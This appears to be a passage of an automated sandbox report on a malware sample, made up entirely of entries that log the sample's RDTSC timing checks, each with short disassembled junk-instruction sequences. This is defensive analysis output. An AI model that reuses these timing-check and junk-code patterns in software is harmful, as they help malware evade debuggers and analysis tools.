                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3B3BB6 second address: 3B3BEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4688C929DFh 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jbe 00007F4688C929D6h 0x00000015 jmp 00007F4688C929E5h 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3B3BEA second address: 3B3C05 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B76Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jbe 00007F4688C1B766h 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3B3EB4 second address: 3B3EBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3B3EBB second address: 3B3EC0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3BA8B1 second address: 3BA8B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3BA8B7 second address: 3BA8D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B776h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3BA8D4 second address: 3BA8E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007F4688C929DEh 0x0000000b popad 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3BA8E9 second address: 3BA901 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4688C1B774h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3BA901 second address: 3BA910 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3BA910 second address: 3BA917 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3BA917 second address: 3BA931 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4688C929E0h 0x00000009 jns 00007F4688C929D6h 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3BA931 second address: 3BA935 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3BA935 second address: 3BA93B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3BAA8E second address: 3BAA93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3BD20F second address: 3BD213 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3BD213 second address: 3BD219 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3C2935 second address: 3C293A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3C2D29 second address: 3C2D2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3C2D2D second address: 3C2D47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 ja 00007F4688C929D6h 0x0000000f pop ebx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jne 00007F4688C929D6h 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 377816 second address: 37781C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 37781C second address: 377845 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F4688C929DAh 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4688C929E6h 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 377845 second address: 37784B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3C32BC second address: 3C32F4 instructions: 0x00000000 rdtsc 0x00000002 js 00007F4688C929D6h 0x00000008 jng 00007F4688C929D6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 pop eax 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 push eax 0x00000016 pop eax 0x00000017 popad 0x00000018 jmp 00007F4688C929E6h 0x0000001d popad 0x0000001e jng 00007F4688C929F0h 0x00000024 push eax 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3C32F4 second address: 3C3306 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F4688C1B766h 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 337B54 second address: 337B58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3C672D second address: 3C673C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push ecx 0x0000000a push eax 0x0000000b pop eax 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e pop ecx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3CBCF0 second address: 3CBCF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3CBCF9 second address: 3CBCFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3CB23A second address: 3CB266 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F4688C929EEh 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F4688C929DAh 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3CB3A3 second address: 3CB3A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3CB3A9 second address: 3CB3AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3CB716 second address: 3CB71E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3D13DC second address: 3D141D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007F4688C929FDh 0x0000000b jmp 00007F4688C929DEh 0x00000010 jmp 00007F4688C929E9h 0x00000015 pushad 0x00000016 jng 00007F4688C929D6h 0x0000001c jo 00007F4688C929D6h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3D1715 second address: 3D1719 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3D1719 second address: 3D1726 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 push esi 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3D1726 second address: 3D172E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3D1F93 second address: 3D1FA3 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F4688C929D6h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3D1FA3 second address: 3D1FA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3D1FA7 second address: 3D1FAD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3D2306 second address: 3D230C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3D230C second address: 3D239C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929E8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jng 00007F4688C929E2h 0x0000000f jno 00007F4688C929D6h 0x00000015 jc 00007F4688C929D6h 0x0000001b push ecx 0x0000001c push edi 0x0000001d pop edi 0x0000001e push esi 0x0000001f pop esi 0x00000020 pop ecx 0x00000021 popad 0x00000022 pushad 0x00000023 pushad 0x00000024 jng 00007F4688C929D6h 0x0000002a jmp 00007F4688C929E2h 0x0000002f popad 0x00000030 js 00007F4688C929E7h 0x00000036 jmp 00007F4688C929DBh 0x0000003b je 00007F4688C929D6h 0x00000041 pushad 0x00000042 jmp 00007F4688C929E9h 0x00000047 jbe 00007F4688C929D6h 0x0000004d popad 0x0000004e push eax 0x0000004f push edx 0x00000050 jl 00007F4688C929D6h 0x00000056 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3D239C second address: 3D23A6 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F4688C1B766h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3D25D6 second address: 3D25DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3D25DC second address: 3D25E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3D287E second address: 3D2882 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3D2882 second address: 3D288A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3D99F4 second address: 3D9A00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F4688C929D6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3D8B1D second address: 3D8B2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jbe 00007F4688C1B766h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3D8B2E second address: 3D8B38 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F4688C929D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3D8C95 second address: 3D8CBD instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F4688C1B778h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 jbe 00007F4688C1B766h 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3D8CBD second address: 3D8CC3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3D937A second address: 3D937E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3D937E second address: 3D938C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929DAh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3D938C second address: 3D93A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 pushad 0x00000008 jp 00007F4688C1B76Ch 0x0000000e jnp 00007F4688C1B766h 0x00000014 pushad 0x00000015 push edi 0x00000016 pop edi 0x00000017 push eax 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3D94F4 second address: 3D9500 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F4688C929D6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3D9500 second address: 3D951A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4688C1B776h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3D951A second address: 3D9531 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F4688C929D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jp 00007F4688C929D6h 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3D9531 second address: 3D9560 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B779h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F4688C1B76Eh 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3D96E8 second address: 3D96F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F4688C929D6h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3DE358 second address: 3DE362 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F4688C1B766h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3DE362 second address: 3DE366 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3E533B second address: 3E5349 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jnp 00007F4688C1B766h 0x0000000d pop edi 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3E565F second address: 3E5697 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929E4h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4688C929DDh 0x00000013 push ebx 0x00000014 jo 00007F4688C929D6h 0x0000001a jno 00007F4688C929D6h 0x00000020 pop ebx 0x00000021 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3E5697 second address: 3E569D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3E569D second address: 3E56AB instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F4688C929D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3E586A second address: 3E5874 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F4688C1B766h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3E5A0A second address: 3E5A10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3E5A10 second address: 3E5A14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3E5CC0 second address: 3E5CDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 jmp 00007F4688C929E5h 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3E5CDF second address: 3E5CE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3E5CE5 second address: 3E5D12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push ecx 0x00000007 jng 00007F4688C929F3h 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3ED0E1 second address: 3ED0EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F4688C1B766h 0x0000000a popad 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3ED21F second address: 3ED235 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F4688C929DDh 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3ED235 second address: 3ED23D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3ED23D second address: 3ED241 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3ED39C second address: 3ED3A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3ED3A0 second address: 3ED3A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3ED3A6 second address: 3ED3AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3EF8C7 second address: 3EF8DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F4688C929D6h 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edi 0x0000000f pushad 0x00000010 jp 00007F4688C929D6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 32DB48 second address: 32DB4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 32DB4E second address: 32DB57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 32DB57 second address: 32DB5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 32DB5B second address: 32DB5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3FD339 second address: 3FD361 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4688C1B76Bh 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b jmp 00007F4688C1B76Ch 0x00000010 popad 0x00000011 push ecx 0x00000012 jbe 00007F4688C1B766h 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a pop ecx 0x0000001b rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3FD4AD second address: 3FD4B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 3FD4B5 second address: 3FD4B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 4004F9 second address: 40051C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F4688C929E1h 0x0000000a push edi 0x0000000b pop edi 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 40051C second address: 40053A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B76Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jc 00007F4688C1B770h 0x0000000f jmp 00007F4688C1B76Ah 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 40053A second address: 40053F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 411FC0 second address: 411FC6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 411E0B second address: 411E2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jng 00007F4688C929EDh 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 41B9C4 second address: 41B9CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\gNo9ad9KO4.exeRDTSC instruction interceptor: First address: 41B9CA second address: 41B9CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
